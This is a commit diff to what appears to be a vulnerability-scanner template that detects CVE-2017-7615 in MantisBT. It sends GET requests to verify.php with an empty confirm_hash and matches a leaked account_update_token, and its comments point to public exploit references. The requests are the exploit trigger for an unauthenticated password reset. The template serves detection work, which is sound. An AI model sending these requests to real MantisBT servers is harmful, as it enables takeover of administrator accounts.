template update

patch-1
bauthard 2020-10-03 11:40:14 +05:30
parent ecddef3d6c
commit a5840f0205
1 changed files with 16 additions and 5 deletions

View File

@ -2,11 +2,20 @@ id: cve-2017-7615
info:
name: CVE-2017-7615
author: bp0lr
author: bp0lr & dwisiswant0
severity: high
description: MantisBT through 2.3.0 allows arbitrary password reset and unauthenticated admin access via an empty confirm_hash value to verify.php.
# Reference to exploit
# https://www.exploit-db.com/exploits/41890
# THIS TEMPLATE IS ONLY FOR DETECTING
# To carry out further attacks, please see reference[2] below.
# This template works by guessing user ID.
# MantisBT before 1.3.10, 2.2.4, and 2.3.1, that can be downloaded on reference[1].
# References:
# - [1] https://sourceforge.net/projects/mantisbt/files/mantis-stable/
# - [2] http://hyp3rlinx.altervista.org/advisories/MANTIS-BUG-TRACKER-PRE-AUTH-REMOTE-PASSWORD-RESET.txt
# - [3] https://www.exploit-db.com/exploits/41890
requests:
- method: GET
@ -15,13 +24,15 @@ requests:
- "{{BaseURL}}/mantis/verify.php?id=1&confirm_hash="
- "{{BaseURL}}/mantisBT/verify.php?id=1&confirm_hash="
- "{{BaseURL}}/mantisbt-2.3.0/verify.php?id=1&confirm_hash="
- "{{BaseURL}}/bugs/verify.php?confirm_hash=&id=1"
matchers-condition: and
matchers:
- type: word
words:
- "account_update_token"
- "<input type=\"hidden\" name=\"account_update_token\" value=\"([a-zA-Z0-9_-]+)\""
part: body
- type: status
status:
- 200
- 200